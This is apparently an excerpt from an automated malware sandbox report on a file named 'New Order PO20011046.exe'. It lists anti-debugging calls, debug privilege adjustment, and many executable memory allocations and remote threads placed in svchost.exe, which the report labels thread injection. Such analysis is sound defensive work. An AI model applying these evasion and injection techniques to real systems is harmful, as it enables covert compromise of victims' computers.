Source: C:\Windows\SysWOW64\svchost.exe Code function: 5_2_504851E0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: New Order PO20011046.exe, 0000000B.00000002.922266457.0000000005310000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\New Order PO20011046.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\New Order PO20011046.exe Code function: 11_2_0040CDC9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\New Order PO20011046.exe Code function: 11_2_0040AD70 GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\New Order PO20011046.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\New Order PO20011046.exe Code function: 11_2_0040E5DC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\New Order PO20011046.exe Code function: 11_2_00416F2A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\New Order PO20011046.exe Code function: 11_2_004123B1 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 50480000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 180000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 190000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1F0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 440000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 450000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 460000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 470000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 480000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 490000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 4A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 4B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 4C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 4D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 4E0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: B10000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: B20000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: B30000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: B40000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: B50000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: B60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: B70000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: B80000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: B90000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: BA0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: BB0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: BC0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: BD0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: BE0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: BF0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: C00000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: C10000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: C20000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: C30000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: C40000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: C50000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: C60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: C70000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: C80000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: C90000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: CA0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: CB0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: CC0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: CD0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: CE0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: CF0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: D00000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: D10000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: D20000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: D30000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: D40000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: D50000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: D60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: D70000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: D80000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: D90000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: DA0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: DB0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: DC0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: DD0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: DE0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: DF0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: E00000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: E10000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: E20000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: E30000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: E40000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: E50000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: E60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: E70000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: E80000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: E90000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: EA0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: EB0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: EC0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: ED0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: EE0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: EF0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: F00000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: F10000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: F20000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: F30000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: F40000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: F50000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: F60000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: F70000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: F80000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: F90000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: FA0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: FB0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: FC0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: FD0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: FE0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: FF0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1000000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1010000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1020000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1030000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1040000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1050000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1060000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1070000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1080000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1090000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 10A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 10B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 10C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 10D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 10E0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 10F0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1100000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1110000 protect: page execute and read and write
Source: C:\Users\user\Desktop\New Order PO20011046.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 1120000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1130000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1140000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1150000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1160000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1170000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1180000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1190000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11B0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11C0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11D0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11E0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 11F0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1200000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1210000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1220000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1230000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1240000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1250000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1260000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1270000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1280000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 1290000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12B0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12C0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12D0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12E0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 12F0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3310000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3320000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3330000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3340000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3350000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3360000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3370000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3380000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3390000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33B0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33C0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33D0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33E0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 33F0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3410000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3420000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3430000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3440000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3450000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3460000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3470000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3480000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3490000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34A0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34B0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34C0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34D0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34E0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 34F0000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3500000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3510000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3520000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3530000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3540000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3550000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3560000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\New Order PO20011046.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 3570000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 1A0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 460000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 4A0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: 4E0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: B40000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: B80000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: BC0000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: C00000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: C40000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: C80000
Source: C:\Users\user\Desktop\New Order PO20011046.exe | Thread created: C:\Windows\SysWOW64\svchost.exe EIP: CC0000
